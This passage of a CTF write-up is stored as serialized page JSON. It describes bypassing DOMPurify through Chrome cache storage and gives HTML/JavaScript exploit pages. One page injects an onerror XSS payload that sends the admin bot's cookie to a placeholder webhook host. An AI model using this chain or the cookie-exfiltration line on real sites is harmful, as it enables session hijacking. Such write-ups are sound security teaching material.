It will replace the name and value attributes with the key and value entries coming from the Chrome cache.",{"type":33,"tag":47,"props":20883,"children":20884},{},[20885],{"type":38,"value":20886},"It is then possible for us to add an input that is completely correct for DOMPurify but will \"break\" the outerHTML at the output of the function to execute JavaScript.",{"type":33,"tag":47,"props":20888,"children":20889},{},[20890],{"type":38,"value":20891},"If we pass the string below as outerHTML of the input function:",{"type":33,"tag":114,"props":20893,"children":20894},{"lang":5929},[20895],{"type":33,"tag":119,"props":20896,"children":20898},{"className":5933,"code":20897,"language":5929,"meta":8,"style":8},"\u003Cinput\n  type=\"image\"\n  data-value=\"{{VALUE}} id=asrc=x name=\"\n  value=\">{{VALUE}}\u003Cimg src=x onerror=alert(1)>\"\n  name=\"ooo\"\n>\n",[20899],{"type":33,"tag":105,"props":20900,"children":20901},{"__ignoreMap":8},[20902,20914,20939,20964,20998,21023],{"type":33,"tag":128,"props":20903,"children":20904},{"class":130,"line":131},[20905,20909],{"type":33,"tag":128,"props":20906,"children":20907},{"style":312},[20908],{"type":38,"value":5977},{"type":33,"tag":128,"props":20910,"children":20911},{"style":1576},[20912],{"type":38,"value":20913},"input\n",{"type":33,"tag":128,"props":20915,"children":20916},{"class":130,"line":362},[20917,20922,20926,20930,20935],{"type":33,"tag":128,"props":20918,"children":20919},{"style":306},[20920],{"type":38,"value":20921},"  
type",{"type":33,"tag":128,"props":20923,"children":20924},{"style":312},[20925],{"type":38,"value":315},{"type":33,"tag":128,"props":20927,"children":20928},{"style":676},[20929],{"type":38,"value":669},{"type":33,"tag":128,"props":20931,"children":20932},{"style":140},[20933],{"type":38,"value":20934},"image",{"type":33,"tag":128,"props":20936,"children":20937},{"style":676},[20938],{"type":38,"value":836},{"type":33,"tag":128,"props":20940,"children":20941},{"class":130,"line":403},[20942,20947,20951,20955,20960],{"type":33,"tag":128,"props":20943,"children":20944},{"style":306},[20945],{"type":38,"value":20946},"  data-value",{"type":33,"tag":128,"props":20948,"children":20949},{"style":312},[20950],{"type":38,"value":315},{"type":33,"tag":128,"props":20952,"children":20953},{"style":676},[20954],{"type":38,"value":669},{"type":33,"tag":128,"props":20956,"children":20957},{"style":140},[20958],{"type":38,"value":20959},"{{VALUE}} id=asrc=x name=",{"type":33,"tag":128,"props":20961,"children":20962},{"style":676},[20963],{"type":38,"value":836},{"type":33,"tag":128,"props":20965,"children":20966},{"class":130,"line":739},[20967,20971,20975,20979,20984,20989,20994],{"type":33,"tag":128,"props":20968,"children":20969},{"style":306},[20970],{"type":38,"value":16876},{"type":33,"tag":128,"props":20972,"children":20973},{"style":312},[20974],{"type":38,"value":315},{"type":33,"tag":128,"props":20976,"children":20977},{"style":676},[20978],{"type":38,"value":669},{"type":33,"tag":128,"props":20980,"children":20981},{"style":140},[20982],{"type":38,"value":20983},">{{VALUE}}",{"type":33,"tag":128,"props":20985,"children":20987},{"style":20986},"--shiki-default:#FDAEB7;--shiki-default-font-style:italic",[20988],{"type":38,"value":5977},{"type":33,"tag":128,"props":20990,"children":20991},{"style":140},[20992],{"type":38,"value":20993},"img src=x 
onerror=alert(1)>",{"type":33,"tag":128,"props":20995,"children":20996},{"style":676},[20997],{"type":38,"value":836},{"type":33,"tag":128,"props":20999,"children":21000},{"class":130,"line":765},[21001,21006,21010,21014,21019],{"type":33,"tag":128,"props":21002,"children":21003},{"style":306},[21004],{"type":38,"value":21005},"  name",{"type":33,"tag":128,"props":21007,"children":21008},{"style":312},[21009],{"type":38,"value":315},{"type":33,"tag":128,"props":21011,"children":21012},{"style":676},[21013],{"type":38,"value":669},{"type":33,"tag":128,"props":21015,"children":21016},{"style":140},[21017],{"type":38,"value":21018},"ooo",{"type":33,"tag":128,"props":21020,"children":21021},{"style":676},[21022],{"type":38,"value":836},{"type":33,"tag":128,"props":21024,"children":21025},{"class":130,"line":804},[21026],{"type":33,"tag":128,"props":21027,"children":21028},{"style":312},[21029],{"type":38,"value":6097},{"type":33,"tag":75,"props":21031,"children":21033},{"imgSrc":21032},"https://res.cloudinary.com/dmju5zuhr/image/upload/v1731288047/writeups/shikanoko/poc_sandbox_xss.webp",[],{"type":33,"tag":47,"props":21035,"children":21036},{},[21037,21039,21045],{"type":38,"value":21038},"We can see that our ",{"type":33,"tag":105,"props":21040,"children":21042},{"className":21041},[],[21043],{"type":38,"value":21044},"\u003Cimg src=x onerror=alert(1)>",{"type":38,"value":21046}," is successfully output from our input",{"type":33,"tag":75,"props":21048,"children":21050},{"imgSrc":21049},"https://res.cloudinary.com/dmju5zuhr/image/upload/v1731279103/writeups/shikanoko/html_result.webp",[],{"type":33,"tag":40,"props":21052,"children":21054},{"id":21053},"final-payload",[21055],{"type":38,"value":21056},"Final payload",{"type":33,"tag":47,"props":21058,"children":21059},{},[21060],{"type":38,"value":21061},"We can now chain our two vulnerabilities to retrieve the flag on the 
bot.",{"type":33,"tag":47,"props":21063,"children":21064},{},[21065],{"type":38,"value":21066},"We will divide our final payload into 2:",{"type":33,"tag":114,"props":21068,"children":21069},{"lang":5929},[21070],{"type":33,"tag":119,"props":21071,"children":21073},{"className":5933,"code":21072,"language":5929,"meta":8,"style":8},"\u003C!-- index.html -->\n\u003Chtml>\n  \u003Cbody>\n    \u003Ch1>Get flag\u003C/h1>\n  \u003C/body>\n  \u003Cscript>\n    window.open(\"/1.html\", \"_blank\");\n    window.open(\"/2.html\", \"_blank\");\n  \u003C/script>\n\u003C/html>\n",[21074],{"type":33,"tag":105,"props":21075,"children":21076},{"__ignoreMap":8},[21077,21085,21100,21115,21147,21162,21177,21231,21283,21298],{"type":33,"tag":128,"props":21078,"children":21079},{"class":130,"line":131},[21080],{"type":33,"tag":128,"props":21081,"children":21082},{"style":5541},[21083],{"type":38,"value":21084},"\u003C!-- index.html -->\n",{"type":33,"tag":128,"props":21086,"children":21087},{"class":130,"line":362},[21088,21092,21096],{"type":33,"tag":128,"props":21089,"children":21090},{"style":312},[21091],{"type":38,"value":5977},{"type":33,"tag":128,"props":21093,"children":21094},{"style":1576},[21095],{"type":38,"value":5929},{"type":33,"tag":128,"props":21097,"children":21098},{"style":312},[21099],{"type":38,"value":6097},{"type":33,"tag":128,"props":21101,"children":21102},{"class":130,"line":403},[21103,21107,21111],{"type":33,"tag":128,"props":21104,"children":21105},{"style":312},[21106],{"type":38,"value":6067},{"type":33,"tag":128,"props":21108,"children":21109},{"style":1576},[21110],{"type":38,"value":5671},{"type":33,"tag":128,"props":21112,"children":21113},{"style":312},[21114],{"type":38,"value":6097},{"type":33,"tag":128,"props":21116,"children":21117},{"class":130,"line":739},[21118,21122,21126,21130,21135,21139,21143],{"type":33,"tag":128,"props":21119,"children":21120},{"style":312},[21121],{"type":38,"value":6105},{"type":33,"tag":128,"props":21123,"children":21
124},{"style":1576},[21125],{"type":38,"value":34},{"type":33,"tag":128,"props":21127,"children":21128},{"style":312},[21129],{"type":38,"value":6054},{"type":33,"tag":128,"props":21131,"children":21132},{"style":323},[21133],{"type":38,"value":21134},"Get flag",{"type":33,"tag":128,"props":21136,"children":21137},{"style":312},[21138],{"type":38,"value":6190},{"type":33,"tag":128,"props":21140,"children":21141},{"style":1576},[21142],{"type":38,"value":34},{"type":33,"tag":128,"props":21144,"children":21145},{"style":312},[21146],{"type":38,"value":6097},{"type":33,"tag":128,"props":21148,"children":21149},{"class":130,"line":765},[21150,21154,21158],{"type":33,"tag":128,"props":21151,"children":21152},{"style":312},[21153],{"type":38,"value":6206},{"type":33,"tag":128,"props":21155,"children":21156},{"style":1576},[21157],{"type":38,"value":5671},{"type":33,"tag":128,"props":21159,"children":21160},{"style":312},[21161],{"type":38,"value":6097},{"type":33,"tag":128,"props":21163,"children":21164},{"class":130,"line":804},[21165,21169,21173],{"type":33,"tag":128,"props":21166,"children":21167},{"style":312},[21168],{"type":38,"value":6067},{"type":33,"tag":128,"props":21170,"children":21171},{"style":1576},[21172],{"type":38,"value":15064},{"type":33,"tag":128,"props":21174,"children":21175},{"style":312},[21176],{"type":38,"value":6097},{"type":33,"tag":128,"props":21178,"children":21179},{"class":130,"line":839},[21180,21184,21188,21193,21197,21201,21206,21210,21214,21218,21223,21227],{"type":33,"tag":128,"props":21181,"children":21182},{"style":306},[21183],{"type":38,"value":8266},{"type":33,"tag":128,"props":21185,"children":21186},{"style":312},[21187],{"type":38,"value":215},{"type":33,"tag":128,"props":21189,"children":21190},{"style":135},[21191],{"type":38,"value":21192},"open",{"type":33,"tag":128,"props":21194,"children":21195},{"style":312},[21196],{"type":38,"value":5566},{"type":33,"tag":128,"props":21198,"children":21199},{"style":676},[21200],{"typ
e":38,"value":669},{"type":33,"tag":128,"props":21202,"children":21203},{"style":140},[21204],{"type":38,"value":21205},"/1.html",{"type":33,"tag":128,"props":21207,"children":21208},{"style":676},[21209],{"type":38,"value":669},{"type":33,"tag":128,"props":21211,"children":21212},{"style":312},[21213],{"type":38,"value":5584},{"type":33,"tag":128,"props":21215,"children":21216},{"style":676},[21217],{"type":38,"value":679},{"type":33,"tag":128,"props":21219,"children":21220},{"style":140},[21221],{"type":38,"value":21222},"_blank",{"type":33,"tag":128,"props":21224,"children":21225},{"style":676},[21226],{"type":38,"value":669},{"type":33,"tag":128,"props":21228,"children":21229},{"style":312},[21230],{"type":38,"value":5815},{"type":33,"tag":128,"props":21232,"children":21233},{"class":130,"line":848},[21234,21238,21242,21246,21250,21254,21259,21263,21267,21271,21275,21279],{"type":33,"tag":128,"props":21235,"children":21236},{"style":306},[21237],{"type":38,"value":8266},{"type":33,"tag":128,"props":21239,"children":21240},{"style":312},[21241],{"type":38,"value":215},{"type":33,"tag":128,"props":21243,"children":21244},{"style":135},[21245],{"type":38,"value":21192},{"type":33,"tag":128,"props":21247,"children":21248},{"style":312},[21249],{"type":38,"value":5566},{"type":33,"tag":128,"props":21251,"children":21252},{"style":676},[21253],{"type":38,"value":669},{"type":33,"tag":128,"props":21255,"children":21256},{"style":140},[21257],{"type":38,"value":21258},"/2.html",{"type":33,"tag":128,"props":21260,"children":21261},{"style":676},[21262],{"type":38,"value":669},{"type":33,"tag":128,"props":21264,"children":21265},{"style":312},[21266],{"type":38,"value":5584},{"type":33,"tag":128,"props":21268,"children":21269},{"style":676},[21270],{"type":38,"value":679},{"type":33,"tag":128,"props":21272,"children":21273},{"style":140},[21274],{"type":38,"value":21222},{"type":33,"tag":128,"props":21276,"children":21277},{"style":676},[21278],{"type":38,"value":669},{"t
ype":33,"tag":128,"props":21280,"children":21281},{"style":312},[21282],{"type":38,"value":5815},{"type":33,"tag":128,"props":21284,"children":21285},{"class":130,"line":976},[21286,21290,21294],{"type":33,"tag":128,"props":21287,"children":21288},{"style":312},[21289],{"type":38,"value":6206},{"type":33,"tag":128,"props":21291,"children":21292},{"style":1576},[21293],{"type":38,"value":15064},{"type":33,"tag":128,"props":21295,"children":21296},{"style":312},[21297],{"type":38,"value":6097},{"type":33,"tag":128,"props":21299,"children":21300},{"class":130,"line":988},[21301,21305,21309],{"type":33,"tag":128,"props":21302,"children":21303},{"style":312},[21304],{"type":38,"value":6190},{"type":33,"tag":128,"props":21306,"children":21307},{"style":1576},[21308],{"type":38,"value":5929},{"type":33,"tag":128,"props":21310,"children":21311},{"style":312},[21312],{"type":38,"value":6097},{"type":33,"tag":239,"props":21314,"children":21315},{},[21316],{"type":33,"tag":243,"props":21317,"children":21318},{},[21319],{"type":38,"value":21320},"The first will create the entry in our victim's cache storage:",{"type":33,"tag":114,"props":21322,"children":21323},{"lang":5929},[21324],{"type":33,"tag":119,"props":21325,"children":21327},{"className":5933,"code":21326,"language":5929,"meta":8,"style":8},"\u003C!-- ./1.html -->\n \u003Chtml>\n  \u003Cbody>\n    \u003Ch1>Test poc\u003C/h1>\n    \u003Cinput id=\"html\" type=\"text\" name=\"ooo\" placeholder=\"Enter HTML content\">\n  \u003C/body>\n  \u003Cscript>\n    (async () => {\n            const sleep = (ms) => new Promise(resolve => setTimeout(resolve, ms));\n                await sleep(1000);\n        document.location = 'http://proxy/?html=\u003Cinput name=\"ooo\" value=\"iiiiii\" name=\"ooo\" type=\"image\">';\n                html_elm = document.getElementById(\"html\");\n                html_elm.value = \"PWNED shikanoko nokonoko koshitantan\";\n                let event = new Event('change');\n                
html_elm.dispatchEvent(event);\n        })();\n  \u003C/script>\n\u003C/html>\n",[21328],{"type":33,"tag":105,"props":21329,"children":21330},{"__ignoreMap":8},[21331,21339,21354,21369,21400,21495,21510,21525,21549,21624,21647,21684,21727,21762,21805,21832,21839,21854],{"type":33,"tag":128,"props":21332,"children":21333},{"class":130,"line":131},[21334],{"type":33,"tag":128,"props":21335,"children":21336},{"style":5541},[21337],{"type":38,"value":21338},"\u003C!-- ./1.html -->\n",{"type":33,"tag":128,"props":21340,"children":21341},{"class":130,"line":362},[21342,21346,21350],{"type":33,"tag":128,"props":21343,"children":21344},{"style":312},[21345],{"type":38,"value":9102},{"type":33,"tag":128,"props":21347,"children":21348},{"style":1576},[21349],{"type":38,"value":5929},{"type":33,"tag":128,"props":21351,"children":21352},{"style":312},[21353],{"type":38,"value":6097},{"type":33,"tag":128,"props":21355,"children":21356},{"class":130,"line":403},[21357,21361,21365],{"type":33,"tag":128,"props":21358,"children":21359},{"style":312},[21360],{"type":38,"value":6067},{"type":33,"tag":128,"props":21362,"children":21363},{"style":1576},[21364],{"type":38,"value":5671},{"type":33,"tag":128,"props":21366,"children":21367},{"style":312},[21368],{"type":38,"value":6097},{"type":33,"tag":128,"props":21370,"children":21371},{"class":130,"line":739},[21372,21376,21380,21384,21388,21392,21396],{"type":33,"tag":128,"props":21373,"children":21374},{"style":312},[21375],{"type":38,"value":6105},{"type":33,"tag":128,"props":21377,"children":21378},{"style":1576},[21379],{"type":38,"value":34},{"type":33,"tag":128,"props":21381,"children":21382},{"style":312},[21383],{"type":38,"value":6054},{"type":33,"tag":128,"props":21385,"children":21386},{"style":323},[21387],{"type":38,"value":19514},{"type":33,"tag":128,"props":21389,"children":21390},{"style":312},[21391],{"type":38,"value":6190},{"type":33,"tag":128,"props":21393,"children":21394},{"style":1576},[21395],{"type":38,"value":
34},{"type":33,"tag":128,"props":21397,"children":21398},{"style":312},[21399],{"type":38,"value":6097},{"type":33,"tag":128,"props":21401,"children":21402},{"class":130,"line":765},[21403,21407,21411,21415,21419,21423,21427,21431,21435,21439,21443,21447,21451,21455,21459,21463,21467,21471,21475,21479,21483,21487,21491],{"type":33,"tag":128,"props":21404,"children":21405},{"style":312},[21406],{"type":38,"value":6105},{"type":33,"tag":128,"props":21408,"children":21409},{"style":1576},[21410],{"type":38,"value":14882},{"type":33,"tag":128,"props":21412,"children":21413},{"style":306},[21414],{"type":38,"value":5987},{"type":33,"tag":128,"props":21416,"children":21417},{"style":312},[21418],{"type":38,"value":315},{"type":33,"tag":128,"props":21420,"children":21421},{"style":676},[21422],{"type":38,"value":669},{"type":33,"tag":128,"props":21424,"children":21425},{"style":140},[21426],{"type":38,"value":5929},{"type":33,"tag":128,"props":21428,"children":21429},{"style":676},[21430],{"type":38,"value":669},{"type":33,"tag":128,"props":21432,"children":21433},{"style":306},[21434],{"type":38,"value":14887},{"type":33,"tag":128,"props":21436,"children":21437},{"style":312},[21438],{"type":38,"value":315},{"type":33,"tag":128,"props":21440,"children":21441},{"style":676},[21442],{"type":38,"value":669},{"type":33,"tag":128,"props":21444,"children":21445},{"style":140},[21446],{"type":38,"value":38},{"type":33,"tag":128,"props":21448,"children":21449},{"style":676},[21450],{"type":38,"value":669},{"type":33,"tag":128,"props":21452,"children":21453},{"style":306},[21454],{"type":38,"value":14688},{"type":33,"tag":128,"props":21456,"children":21457},{"style":312},[21458],{"type":38,"value":315},{"type":33,"tag":128,"props":21460,"children":21461},{"style":676},[21462],{"type":38,"value":669},{"type":33,"tag":128,"props":21464,"children":21465},{"style":140},[21466],{"type":38,"value":21018},{"type":33,"tag":128,"props":21468,"children":21469},{"style":676},[21470],{"type":
38,"value":669},{"type":33,"tag":128,"props":21472,"children":21473},{"style":306},[21474],{"type":38,"value":14928},{"type":33,"tag":128,"props":21476,"children":21477},{"style":312},[21478],{"type":38,"value":315},{"type":33,"tag":128,"props":21480,"children":21481},{"style":676},[21482],{"type":38,"value":669},{"type":33,"tag":128,"props":21484,"children":21485},{"style":140},[21486],{"type":38,"value":14941},{"type":33,"tag":128,"props":21488,"children":21489},{"style":676},[21490],{"type":38,"value":669},{"type":33,"tag":128,"props":21492,"children":21493},{"style":312},[21494],{"type":38,"value":6097},{"type":33,"tag":128,"props":21496,"children":21497},{"class":130,"line":804},[21498,21502,21506],{"type":33,"tag":128,"props":21499,"children":21500},{"style":312},[21501],{"type":38,"value":6206},{"type":33,"tag":128,"props":21503,"children":21504},{"style":1576},[21505],{"type":38,"value":5671},{"type":33,"tag":128,"props":21507,"children":21508},{"style":312},[21509],{"type":38,"value":6097},{"type":33,"tag":128,"props":21511,"children":21512},{"class":130,"line":839},[21513,21517,21521],{"type":33,"tag":128,"props":21514,"children":21515},{"style":312},[21516],{"type":38,"value":6067},{"type":33,"tag":128,"props":21518,"children":21519},{"style":1576},[21520],{"type":38,"value":15064},{"type":33,"tag":128,"props":21522,"children":21523},{"style":312},[21524],{"type":38,"value":6097},{"type":33,"tag":128,"props":21526,"children":21527},{"class":130,"line":848},[21528,21533,21537,21541,21545],{"type":33,"tag":128,"props":21529,"children":21530},{"style":312},[21531],{"type":38,"value":21532},"    
(",{"type":33,"tag":128,"props":21534,"children":21535},{"style":300},[21536],{"type":38,"value":13862},{"type":33,"tag":128,"props":21538,"children":21539},{"style":312},[21540],{"type":38,"value":13259},{"type":33,"tag":128,"props":21542,"children":21543},{"style":312},[21544],{"type":38,"value":5625},{"type":33,"tag":128,"props":21546,"children":21547},{"style":312},[21548],{"type":38,"value":762},{"type":33,"tag":128,"props":21550,"children":21551},{"class":130,"line":976},[21552,21556,21560,21564,21568,21572,21576,21580,21584,21588,21592,21596,21600,21604,21608,21612,21616,21620],{"type":33,"tag":128,"props":21553,"children":21554},{"style":300},[21555],{"type":38,"value":19683},{"type":33,"tag":128,"props":21557,"children":21558},{"style":135},[21559],{"type":38,"value":19688},{"type":33,"tag":128,"props":21561,"children":21562},{"style":312},[21563],{"type":38,"value":5657},{"type":33,"tag":128,"props":21565,"children":21566},{"style":312},[21567],{"type":38,"value":2852},{"type":33,"tag":128,"props":21569,"children":21570},{"style":306},[21571],{"type":38,"value":19701},{"type":33,"tag":128,"props":21573,"children":21574},{"style":312},[21575],{"type":38,"value":2966},{"type":33,"tag":128,"props":21577,"children":21578},{"style":312},[21579],{"type":38,"value":5625},{"type":33,"tag":128,"props":21581,"children":21582},{"style":300},[21583],{"type":38,"value":13061},{"type":33,"tag":128,"props":21585,"children":21586},{"style":437},[21587],{"type":38,"value":13066},{"type":33,"tag":128,"props":21589,"children":21590},{"style":312},[21591],{"type":38,"value":5566},{"type":33,"tag":128,"props":21593,"children":21594},{"style":306},[21595],{"type":38,"value":13076},{"type":33,"tag":128,"props":21597,"children":21598},{"style":312},[21599],{"type":38,"value":5625},{"type":33,"tag":128,"props":21601,"children":21602},{"style":135},[21603],{"type":38,"value":19734},{"type":33,"tag":128,"props":21605,"children":21606},{"style":312},[21607],{"type":38,"value":5566},{
"type":33,"tag":128,"props":21609,"children":21610},{"style":306},[21611],{"type":38,"value":13076},{"type":33,"tag":128,"props":21613,"children":21614},{"style":312},[21615],{"type":38,"value":5584},{"type":33,"tag":128,"props":21617,"children":21618},{"style":306},[21619],{"type":38,"value":19751},{"type":33,"tag":128,"props":21621,"children":21622},{"style":312},[21623],{"type":38,"value":9722},{"type":33,"tag":128,"props":21625,"children":21626},{"class":130,"line":988},[21627,21631,21635,21639,21643],{"type":33,"tag":128,"props":21628,"children":21629},{"style":1576},[21630],{"type":38,"value":19763},{"type":33,"tag":128,"props":21632,"children":21633},{"style":135},[21634],{"type":38,"value":19688},{"type":33,"tag":128,"props":21636,"children":21637},{"style":312},[21638],{"type":38,"value":5566},{"type":33,"tag":128,"props":21640,"children":21641},{"style":523},[21642],{"type":38,"value":78},{"type":33,"tag":128,"props":21644,"children":21645},{"style":312},[21646],{"type":38,"value":5815},{"type":33,"tag":128,"props":21648,"children":21649},{"class":130,"line":1001},[21650,21655,21659,21663,21667,21671,21676,21680],{"type":33,"tag":128,"props":21651,"children":21652},{"style":306},[21653],{"type":38,"value":21654},"        document",{"type":33,"tag":128,"props":21656,"children":21657},{"style":312},[21658],{"type":38,"value":215},{"type":33,"tag":128,"props":21660,"children":21661},{"style":306},[21662],{"type":38,"value":8275},{"type":33,"tag":128,"props":21664,"children":21665},{"style":312},[21666],{"type":38,"value":5657},{"type":33,"tag":128,"props":21668,"children":21669},{"style":676},[21670],{"type":38,"value":6739},{"type":33,"tag":128,"props":21672,"children":21673},{"style":140},[21674],{"type":38,"value":21675},"http://proxy/?html=\u003Cinput name=\"ooo\" value=\"iiiiii\" name=\"ooo\" 
type=\"image\">",{"type":33,"tag":128,"props":21677,"children":21678},{"style":676},[21679],{"type":38,"value":6040},{"type":33,"tag":128,"props":21681,"children":21682},{"style":312},[21683],{"type":38,"value":5676},{"type":33,"tag":128,"props":21685,"children":21686},{"class":130,"line":1014},[21687,21691,21695,21699,21703,21707,21711,21715,21719,21723],{"type":33,"tag":128,"props":21688,"children":21689},{"style":306},[21690],{"type":38,"value":19824},{"type":33,"tag":128,"props":21692,"children":21693},{"style":312},[21694],{"type":38,"value":5657},{"type":33,"tag":128,"props":21696,"children":21697},{"style":306},[21698],{"type":38,"value":7562},{"type":33,"tag":128,"props":21700,"children":21701},{"style":312},[21702],{"type":38,"value":215},{"type":33,"tag":128,"props":21704,"children":21705},{"style":135},[21706],{"type":38,"value":19841},{"type":33,"tag":128,"props":21708,"children":21709},{"style":312},[21710],{"type":38,"value":5566},{"type":33,"tag":128,"props":21712,"children":21713},{"style":676},[21714],{"type":38,"value":669},{"type":33,"tag":128,"props":21716,"children":21717},{"style":140},[21718],{"type":38,"value":5929},{"type":33,"tag":128,"props":21720,"children":21721},{"style":676},[21722],{"type":38,"value":669},{"type":33,"tag":128,"props":21724,"children":21725},{"style":312},[21726],{"type":38,"value":5815},{"type":33,"tag":128,"props":21728,"children":21729},{"class":130,"line":1026},[21730,21734,21738,21742,21746,21750,21754,21758],{"type":33,"tag":128,"props":21731,"children":21732},{"style":306},[21733],{"type":38,"value":19824},{"type":33,"tag":128,"props":21735,"children":21736},{"style":312},[21737],{"type":38,"value":215},{"type":33,"tag":128,"props":21739,"children":21740},{"style":306},[21741],{"type":38,"value":14160},{"type":33,"tag":128,"props":21743,"children":21744},{"style":312},[21745],{"type":38,"value":5657},{"type":33,"tag":128,"props":21747,"children":21748},{"style":676},[21749],{"type":38,"value":679},{"type":33,"ta
g":128,"props":21751,"children":21752},{"style":140},[21753],{"type":38,"value":19454},{"type":33,"tag":128,"props":21755,"children":21756},{"style":676},[21757],{"type":38,"value":669},{"type":33,"tag":128,"props":21759,"children":21760},{"style":312},[21761],{"type":38,"value":5676},{"type":33,"tag":128,"props":21763,"children":21764},{"class":130,"line":1038},[21765,21769,21773,21777,21781,21785,21789,21793,21797,21801],{"type":33,"tag":128,"props":21766,"children":21767},{"style":300},[21768],{"type":38,"value":19904},{"type":33,"tag":128,"props":21770,"children":21771},{"style":306},[21772],{"type":38,"value":17575},{"type":33,"tag":128,"props":21774,"children":21775},{"style":312},[21776],{"type":38,"value":5657},{"type":33,"tag":128,"props":21778,"children":21779},{"style":300},[21780],{"type":38,"value":13061},{"type":33,"tag":128,"props":21782,"children":21783},{"style":135},[21784],{"type":38,"value":19921},{"type":33,"tag":128,"props":21786,"children":21787},{"style":312},[21788],{"type":38,"value":5566},{"type":33,"tag":128,"props":21790,"children":21791},{"style":676},[21792],{"type":38,"value":6040},{"type":33,"tag":128,"props":21794,"children":21795},{"style":140},[21796],{"type":38,"value":17521},{"type":33,"tag":128,"props":21798,"children":21799},{"style":676},[21800],{"type":38,"value":6040},{"type":33,"tag":128,"props":21802,"children":21803},{"style":312},[21804],{"type":38,"value":5815},{"type":33,"tag":128,"props":21806,"children":21807},{"class":130,"line":1051},[21808,21812,21816,21820,21824,21828],{"type":33,"tag":128,"props":21809,"children":21810},{"style":306},[21811],{"type":38,"value":19824},{"type":33,"tag":128,"props":21813,"children":21814},{"style":312},[21815],{"type":38,"value":215},{"type":33,"tag":128,"props":21817,"children":21818},{"style":135},[21819],{"type":38,"value":19957},{"type":33,"tag":128,"props":21821,"children":21822},{"style":312},[21823],{"type":38,"value":5566},{"type":33,"tag":128,"props":21825,"children":2182
6},{"style":306},[21827],{"type":38,"value":17546},{"type":33,"tag":128,"props":21829,"children":21830},{"style":312},[21831],{"type":38,"value":5815},{"type":33,"tag":128,"props":21833,"children":21834},{"class":130,"line":1063},[21835],{"type":33,"tag":128,"props":21836,"children":21837},{"style":312},[21838],{"type":38,"value":19977},{"type":33,"tag":128,"props":21840,"children":21841},{"class":130,"line":1076},[21842,21846,21850],{"type":33,"tag":128,"props":21843,"children":21844},{"style":312},[21845],{"type":38,"value":6206},{"type":33,"tag":128,"props":21847,"children":21848},{"style":1576},[21849],{"type":38,"value":15064},{"type":33,"tag":128,"props":21851,"children":21852},{"style":312},[21853],{"type":38,"value":6097},{"type":33,"tag":128,"props":21855,"children":21856},{"class":130,"line":1089},[21857,21861,21865],{"type":33,"tag":128,"props":21858,"children":21859},{"style":312},[21860],{"type":38,"value":6190},{"type":33,"tag":128,"props":21862,"children":21863},{"style":1576},[21864],{"type":38,"value":5929},{"type":33,"tag":128,"props":21866,"children":21867},{"style":312},[21868],{"type":38,"value":6097},{"type":33,"tag":239,"props":21870,"children":21871},{},[21872],{"type":33,"tag":243,"props":21873,"children":21874},{},[21875],{"type":38,"value":21876},"The second will exploit the XSS injection to retrieve the admin's cookie:",{"type":33,"tag":114,"props":21878,"children":21879},{"lang":5929},[21880],{"type":33,"tag":119,"props":21881,"children":21883},{"className":5933,"code":21882,"language":5929,"meta":8,"style":8},"\u003C!-- ./2.html -->\n\u003Chtml>\n  \u003Cbody>\n    \u003Ch1>Test poc\u003C/h1>\n    \u003Cinput id=\"html\" type=\"text\" name=\"ooo\" placeholder=\"Enter HTML content\">\n  \u003C/body>\n  \u003Cscript>\n    (async () => {\n            const sleep = (ms) => new Promise(resolve => setTimeout(resolve, ms));\n                await sleep(1000);\n        document.location = `http://proxy/?html=\u003Cinput name=\"aaa\" 
value=\">{{VALUE}}hello\u003Cimg src=x onerror=window.location='https://webhook/?flag='+btoa(document.cookie)>\" data-value=\"DDDDD{{VALUE}}aaaaa id=asrc=x name=\"ooo\" type=\"image\">`;\n                html_elm = document.getElementById(\"html\");\n                html_elm.value = \"PWNED shikanoko nokonoko koshitantan\";\n                let event = new Event('change');\n                html_elm.dispatchEvent(event);\n        })();\n  \u003C/script>\n\u003C/html>\n\n",[21884],{"type":33,"tag":105,"props":21885,"children":21886},{"__ignoreMap":8},[21887,21895,21910,21925,21956,22051,22066,22081,22104,22179,22202,22238,22281,22316,22359,22386,22393,22408],{"type":33,"tag":128,"props":21888,"children":21889},{"class":130,"line":131},[21890],{"type":33,"tag":128,"props":21891,"children":21892},{"style":5541},[21893],{"type":38,"value":21894},"\u003C!-- ./2.html -->\n",{"type":33,"tag":128,"props":21896,"children":21897},{"class":130,"line":362},[21898,21902,21906],{"type":33,"tag":128,"props":21899,"children":21900},{"style":312},[21901],{"type":38,"value":5977},{"type":33,"tag":128,"props":21903,"children":21904},{"style":1576},[21905],{"type":38,"value":5929},{"type":33,"tag":128,"props":21907,"children":21908},{"style":312},[21909],{"type":38,"value":6097},{"type":33,"tag":128,"props":21911,"children":21912},{"class":130,"line":403},[21913,21917,21921],{"type":33,"tag":128,"props":21914,"children":21915},{"style":312},[21916],{"type":38,"value":6067},{"type":33,"tag":128,"props":21918,"children":21919},{"style":1576},[21920],{"type":38,"value":5671},{"type":33,"tag":128,"props":21922,"children":21923},{"style":312},[21924],{"type":38,"value":6097},{"type":33,"tag":128,"props":21926,"children":21927},{"class":130,"line":739},[21928,21932,21936,21940,21944,21948,21952],{"type":33,"tag":128,"props":21929,"children":21930},{"style":312},[21931],{"type":38,"value":6105},{"type":33,"tag":128,"props":21933,"children":21934},{"style":1576},[21935],{"type":38,"value":34},{
"type":33,"tag":128,"props":21937,"children":21938},{"style":312},[21939],{"type":38,"value":6054},{"type":33,"tag":128,"props":21941,"children":21942},{"style":323},[21943],{"type":38,"value":19514},{"type":33,"tag":128,"props":21945,"children":21946},{"style":312},[21947],{"type":38,"value":6190},{"type":33,"tag":128,"props":21949,"children":21950},{"style":1576},[21951],{"type":38,"value":34},{"type":33,"tag":128,"props":21953,"children":21954},{"style":312},[21955],{"type":38,"value":6097},{"type":33,"tag":128,"props":21957,"children":21958},{"class":130,"line":765},[21959,21963,21967,21971,21975,21979,21983,21987,21991,21995,21999,22003,22007,22011,22015,22019,22023,22027,22031,22035,22039,22043,22047],{"type":33,"tag":128,"props":21960,"children":21961},{"style":312},[21962],{"type":38,"value":6105},{"type":33,"tag":128,"props":21964,"children":21965},{"style":1576},[21966],{"type":38,"value":14882},{"type":33,"tag":128,"props":21968,"children":21969},{"style":306},[21970],{"type":38,"value":5987},{"type":33,"tag":128,"props":21972,"children":21973},{"style":312},[21974],{"type":38,"value":315},{"type":33,"tag":128,"props":21976,"children":21977},{"style":676},[21978],{"type":38,"value":669},{"type":33,"tag":128,"props":21980,"children":21981},{"style":140},[21982],{"type":38,"value":5929},{"type":33,"tag":128,"props":21984,"children":21985},{"style":676},[21986],{"type":38,"value":669},{"type":33,"tag":128,"props":21988,"children":21989},{"style":306},[21990],{"type":38,"value":14887},{"type":33,"tag":128,"props":21992,"children":21993},{"style":312},[21994],{"type":38,"value":315},{"type":33,"tag":128,"props":21